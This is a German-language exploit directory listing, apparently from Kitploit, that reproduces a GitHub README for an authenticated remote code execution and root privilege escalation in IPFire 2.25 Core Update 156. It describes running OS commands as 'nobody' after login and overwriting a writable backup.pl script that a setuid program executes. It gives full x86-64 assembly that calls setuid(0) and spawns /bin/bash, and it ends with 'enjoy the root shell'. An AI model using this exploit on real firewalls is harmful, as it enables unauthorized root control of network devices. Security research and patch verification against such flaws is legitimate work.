Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/kaanaryoverflow/ipfire-2-25-auth-rce
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPayload DevelopmentBinary Exploitation
GitHubkaanaryoverflow/ipfire-2-25-auth-rce

ipfire-2-25-auth-rce

ipfire 2.25 authenticated remote code execution

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 5 JahrenNoch nicht geprüft

Ipfire 2-25 (core update 156) authentifizierte RCE

  • System führt beim Installieren eines Pakets Befehle aus

packfileinstallation

  • System holt 7zip nur aus HTML

pocpc0

  • und prüft das tmp-Verzeichnis

pocpc1

  • Version 2.25 - Core Update 156

version

  • Ipfire erlaubt nach dem Login das Ausführen beliebiger OS-Befehle als nobody

Root werden!

  • die suid-Binärdateien prüfen

find-suid

  • Das Backup-Programm führt ein weiteres Skript aus: /var/ipfire/backup/bin/backup.pl (es ist ein Bash-Skript und die Berechtigungen sehen gut aus)

backup-tespiti

  • Versuch, in das Bash-Skript zu schreiben. (Kein Fehler. GUT!)

yazma-denemesi

  • Versuch, Bash auszuführen

yazabilme-kanıtı

  • Ja. Wir können es ausführen, aber es läuft mit niedrigen Rechten. Wir müssen setuid(0) auslösen!
  • Speichere dies und führe alti name.asm q aus
  • alti ist mein eigenes Compile-Check-Programm im soo_deep-Repo.
root@kitploit:~
bits 64
section .data
  string db "/bin/bash",0x00
  olmadis db "basarisiz.",0x0a,0x00
  olmadil equ $-olmadis
section .text
  global main
main:
  mov rax,105
  mov rdi,0
  syscall
  cmp rax,0
  je getbash

  mov rax,1
  mov rdi,1
  mov rsi,olmadis
  mov rdx,olmadil
  syscall

  mov rax,60
  xor rdi,rdi
  syscall

getbash:
  mov rax,59
  mov rdi,string
  mov rsi,0
  mov rdx,0
  syscall
  • und schreibe das neue Programm nach /var/ipfire/backup/bin/backup.pl. (Wir können einen Python-HTTP-Server und curl zum Schreiben verwenden)

  • und genieße die Root-Shell!

image

Tool herunterladen